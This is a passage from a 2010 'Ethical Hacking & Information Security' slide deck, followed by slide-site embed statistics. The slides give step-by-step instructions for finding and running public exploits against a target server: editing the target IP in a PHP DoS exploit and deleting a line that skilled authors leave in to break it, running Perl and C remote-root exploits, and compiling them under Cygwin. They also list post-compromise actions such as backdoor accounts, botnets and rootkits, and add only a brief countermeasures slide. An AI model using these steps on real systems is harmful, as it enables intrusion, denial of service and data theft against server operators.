Network Hacking Techniques Ethical Hacking & Banner Grabbing Information Security AK Dhamija Banner Grabbing Introduction • To find out the software and its version,which is needed to search for vulnerability Hacker Password Hacking Low Tech Banner Grabbing Steps Methods High Tech • Telnet into service port To figure out what software and version of the service Methods Countermeasures • If you are using Windows Vista, then telnet is not installed by default, Use control panel - Programs and Features - Turn Windows features on or off - Telnet Client to install Web Hacking • If you found port 21 (ie ftp) open, then telnet www.targetsite.com 21 to find out FTP software Techniques Countermeasures Network Hacking Techniques Countermeasures Windows Hacking Linux Hacking Wireless Hacking • Nmap’s full version detection option to get this information, if telnet doesn’t work Malware References AK Dhamija (DIPR, DRDO) Ethical Hacking & Information Security May 14, 2010 48 / 56

Network Hacking Techniques Ethical Hacking & Searching for Vulnerabilities Information Security AK Dhamija Searching for Vulnerabilities Introduction Hacker • Search a couple vulnerability databases for an exploit Password • If there’s an exploit available, run it against the server and take complete control Hacking • Popular exploit databases are Milw0rm, SecurityFocus, osvdb Low Tech Methods High Tech • If there isn’t any, you can move onto another open port and try again on a different service. Methods Countermeasures Alternatively develop a ”0-day” exploit • No one knows about the vulnerability, hundreds of websites can be hacked before the Web Hacking vulnerability is discovered and patched Techniques • The hacker could sell the vulnerability for thousands of dollars Countermeasures • It shows that the hacker is very skillful and raises his ranks in the hacker community Network Hacking Techniques Countermeasures Attacks used against discovered vulnerabilities Windows • Denial-of-Service(DoS) :Send a flood of information to the target server causing it to use up all of Hacking its resources, and in return pushing it offline, or deny requests to others Linux Hacking • Buffer Overflow(BoF) :The extra information overflows into other buffers causing them to be overwritten with malicious code created by the hacker. Once this code is executed, the hacker can Wireless receive full control of the server Hacking Malware References AK Dhamija (DIPR, DRDO) Ethical Hacking & Information Security May 14, 2010 49 / 56

Network Hacking Techniques Ethical Hacking & Searching for Vulnerabilities Information Security AK Dhamija Introduction Hacker Password Hacking Low Tech Methods Types of Exploits High Tech Methods • Local Exploit :You must ﬁrst have access and privileges on the machine. Local exploits are usually Countermeasures used to escalate ones privileges to admin or root Web Hacking • Remote Exploit :it isn’t run locally, but launched from anywhere across the internet Techniques • A hacker usually has to use a combination of both remote and local exploits to gain full control of a Countermeasures system. For example, the hacker may have been able to gain regular privileges with a remote exploit Network attack, and then be able to escalate to root privileges with the help of a local exploit Hacking Techniques Countermeasures Windows Hacking Linux Hacking Wireless Hacking Malware References AK Dhamija (DIPR, DRDO) Ethical Hacking & Information Security May 14, 2010 50 / 56

Network Hacking Techniques Ethical Hacking & Penetrating Information Security AK Dhamija Penetrating • Running the exploits against the target and penetrating the server Introduction Hacker Password DOS php exploit: PHP http://milw0rm.com/exploits/2901 Hacking • Install PHP onto your computer. WAMP is a free web server that comes with PHP Low Tech Methods • Paste the PHP exploit into notepad or any word processor and save it as ”exploit.php” High Tech Methods • On line 13 of this exploit you will see: $address = gethostbyname(’192.168.1.3’); edit here the IP Countermeasures address of the target Web Hacking • Save this edited ﬁle into the PHP directory on your server that contains the PHP executable ﬁle. In WAMP the directory would be C:wampbinphpphp5.2.5 Techniques Countermeasures • To run it simply type in ”php exploit.php” and hit enter Network Hacking Techniques Countermeasures Windows Hacking • When skilled hackers create exploits, they sometimes insert mistakes or extra code so that script Linux Hacking kiddies with no programming knowledge wouldn’t be able to use them Wireless • At line 18 of this exploit , we $junk.=”../../../sun-tzu/../../../sun-tzu/../../../sun-tzu”; Just remove this line and error will disappear Hacking • a DoS attack will be launched; the target website up until you exit the command screen Malware • The site will begin to lag and it’ll take a long time to load pages. Eventually the server may go down References completely AK Dhamija (DIPR, DRDO) Ethical Hacking & Information Security May 14, 2010 51 / 56

Network Hacking Techniques Ethical Hacking & Penetrating Information Security AK Dhamija DOS perl exploit: http://milw0rm.com/exploits/6581 • Download and install the appropriate version of ActivePerl Introduction • Edit the options like the target server and others as needed. Then save the ﬁle as ”exploit.pl”. As Hacker you can see Pearl exploits begin with ”!/usr/bin/perl” Password • Run the exploit by typing: ”perl exploit.pl” Hacking Low Tech Methods High Tech Python, C/C++ on Linux, Methods Countermeasures • Python exploit: http://milw0rm.com/exploits/3523 Web Hacking • Most C/C++ exploit code is made to be compiled in Linux Techniques • Save the remote root exploit http://milw0rm.com/exploits/269 as ”exploit.c” Countermeasures • Install a development package of all the libraries and headers needed to compile C/C++ scripts by Network sudo apt-get install build-essential Hacking Techniques Countermeasures Windows Hacking Linux Hacking Wireless Hacking Malware •Once the hacker ran the script against a vulnerable server running BeroFTPD 1.3.4 and the script References worked, the hacker would now have root access to the server AK Dhamija (DIPR, DRDO) Ethical Hacking & Information Security May 14, 2010 52 / 56

Network Hacking Techniques Ethical Hacking & Penetrating Information Security AK Dhamija C/C++ on Windows Introduction Hacker • To run in Windows, you can use Cygwin Password • Cygwin is a Linux-like environment that runs in Windows and acts as a Linux emulation layer, allowing you to run Linux scripts in windows Hacking Low Tech • Download Cygwin from http://www.cygwin.com/ Methods High Tech • Using the same exploit as the last example, save and move it into the ”C:cygwin” directory as Methods ”exploit.c” Countermeasures • In ”C:cygwin” directory do ”gcc exploit.c -o exploit” Web Hacking • Run the ﬁle ”exploit.exe” simply type simply type ”./exploit” Techniques Countermeasures Network Hacking Techniques Countermeasures Windows Hacking Linux Hacking Wireless • You get the root access to the target computer Hacking Malware References AK Dhamija (DIPR, DRDO) Ethical Hacking & Information Security May 14, 2010 53 / 56

Network Hacking Techniques Ethical Hacking & Penetrating Information Security AK Dhamija Introduction Hacker Password Hacking root access Low Tech Methods Once you get root access , you can do High Tech Methods • Add yourself as a permanent user for future access Countermeasures • Add the server into your botnet collection so he could use it as a weapon against other servers Web Hacking • Use it as a proxy to hack other websites Techniques • Install a rootkit so he can come back and have full control over the server when needed Countermeasures • Constantly steel information as it comes Network Hacking • Use the system to store illegal data Techniques • Deface the website and sometimes the hacker will delete everything oﬀ of the server Countermeasures Windows Hacking Linux Hacking Wireless Hacking Malware References AK Dhamija (DIPR, DRDO) Ethical Hacking & Information Security May 14, 2010 54 / 56

Network Hacking Countermeasures Ethical Hacking & Network Hacking Information Security AK Dhamija Introduction Hacker Password Hacking Countermeasures Low Tech Methods High Tech • Keep all your software up to date Methods Countermeasures • There will always be new vulnerabilities coming out, and your responsibility is to patch them immediately after a patch comes out Web Hacking Techniques • Implement a ﬁrewall. This will keep most of the bad data out and good data in Countermeasures Network • Install anti-virus software Hacking • Scan your system with a vulnerability scanner. This may reveal possible vulnerabilities in your system Techniques Countermeasures Windows Hacking Linux Hacking Wireless Hacking Malware References AK Dhamija (DIPR, DRDO) Ethical Hacking & Information Security May 14, 2010 55 / 56

References Ethical Hacking & References Information Security AK Dhamija Introduction References Hacker Password • http://www.learn-how-to-hack.net Hacking Low Tech Methods • http://www.MrCracker.com High Tech Methods Countermeasures • http://hackthisway.com Web Hacking Techniques Countermeasures Presentation available at Network Hacking http://akdhamija.webs.com/ Techniques Countermeasures Windows For any Clariﬁcation, mail me at Hacking dhamija.ak@gmail.com Linux Hacking Wireless Hacking Malware References AK Dhamija (DIPR, DRDO) Ethical Hacking & Information Security May 14, 2010 56 / 56

http://lynkyinka.blogspot.com	255
http://lynkyinka.blogspot.in	88
http://www.slideshare.net	39
http://delitosinformaticos1b.blogspot.com	20
http://derechopucesa1brgfrtr.blogspot.com	19
http://lynkyinka.blogspot.com.au	16
http://lynkyinka.blogspot.ca	13
http://lynkyinka.blogspot.co.uk	11
http://localhost	10
http://socialmexican.com	10
http://lynkyinka.blogspot.be	7
http://www.ncc.edu.pk	6
http://lynkyinka.blogspot.com.es	5
http://lynkyinka.blogspot.tw	5
http://lynkyinka.blogspot.cz	5
http://lynkyinka.blogspot.gr	4
http://lynkyinka.blogspot.ro	4
http://lynkyinka.blogspot.nl	4
http://lynkyinka.blogspot.com.br	4
http://lynkyinka.blogspot.fr	3
http://lynkyinka.blogspot.ru	3
http://lynkyinka.blogspot.sg	3
http://lynkyinka.blogspot.hk	3
http://lynkyinka.blogspot.de	2
http://lynkyinka.blogspot.no	2
http://lynkyinka.blogspot.co.at	2
http://www.edmodo.com	2
http://www.vizzwebsolutions.com	2
http://peculado1b.blogspot.com	2
http://lynkyinka.blogspot.hu	2
http://lynkyinka.blogspot.it	2
http://lynkyinka.blogspot.com.ar	2
http://webcache.googleusercontent.com	1
http://1502811688.nvmodules.netvibes.com	1
http://www.linkedin.com	1
http://coreimpactturkiye.blogspot.com	1
http://lynkyinka.blogspot.ch	1

Ethical hacking & Information Security

by Ajay Dhamija on May 13, 2010

Accessibility

Categories

Upload Details

Usage Rights

37 Embeds 560

Statistics

Ethical hacking & Information Security Presentation Transcript